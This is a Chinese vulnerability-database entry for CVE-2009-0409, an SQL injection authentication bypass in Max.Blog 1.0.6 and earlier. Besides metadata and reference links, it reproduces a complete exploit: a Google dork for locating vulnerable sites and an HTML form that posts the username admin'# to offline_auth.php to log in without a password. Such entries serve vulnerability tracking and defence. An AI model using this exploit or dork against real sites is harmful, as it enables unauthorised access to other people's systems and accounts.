mzbservices max.blog SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117308 漏洞类型 SQL注入
发布时间 2009-01-28 更新时间 2009-02-10
CVE编号 CVE-2009-0409 CNNVD-ID CNNVD-200902-056
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7899
https://cxsecurity.com/issue/WLB-2009010077
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-056
|漏洞详情
Max.Blog是开放源码的博客发布和管理工具。Max.Blog1.0.6及之前版本中的offline_auth.php存在SQL注入漏洞。当magic_quotes_gpc被中止时,远程攻击者可以借助用户名参数,执行任意的SQL指令。
|漏洞EXP
###################             Salvatore "drosophila" Fresta
###################


Application:    Max.Blog
                               http://www.mzbservices.com
Version:                Max.Blog <= 1.0.6
Bug:            * Offline Authentication Bypass
Exploitation:   Remote
Dork:                   intext:"Powered by Max.Blog"
Date:           27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                       e-mail: drosophilaxxx@gmail.com


############################################################################

- BUGS

Offline Authentication Bypass Exploit:

       Requisites: magic quotes = off

       File affected: offline_auth.php

       This bug allows a guest to bypass an offline authentication service
       using SQL Injection vulnerability.

############################################################################

- CODE

<html>
       <head>
               <title>
                       Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline
Authentication Bypass Exploit
               </title>
       </head>
       <body>
               <form
action="http://www.site.com/path/offline_auth.php" method="POST">
                       <input type="text" name="username"
value="admin'#" size="15">
                       <input type="hidden" name="password">
                       <input type="submit" value="Go!">
               </form>
       </body>
</html>

############################################################################

# milw0rm.com [2009-01-28]
|参考资料

来源:BID
名称:33493
链接:http://www.securityfocus.com/bid/33493
来源:BUGTRAQ
名称:20090127Max.Blog<=1.0.6(offline_auth.php)OfflineAuthenticationBypass
链接:http://www.securityfocus.com/archive/1/archive/1/500470/100/0/threaded
来源:MILW0RM
名称:7899
链接:http://www.milw0rm.com/exploits/7899
来源:SECUNIA
名称:33658
链接:http://secunia.com/advisories/33658
来源:OSVDB
名称:51645
链接:http://osvdb.org/51645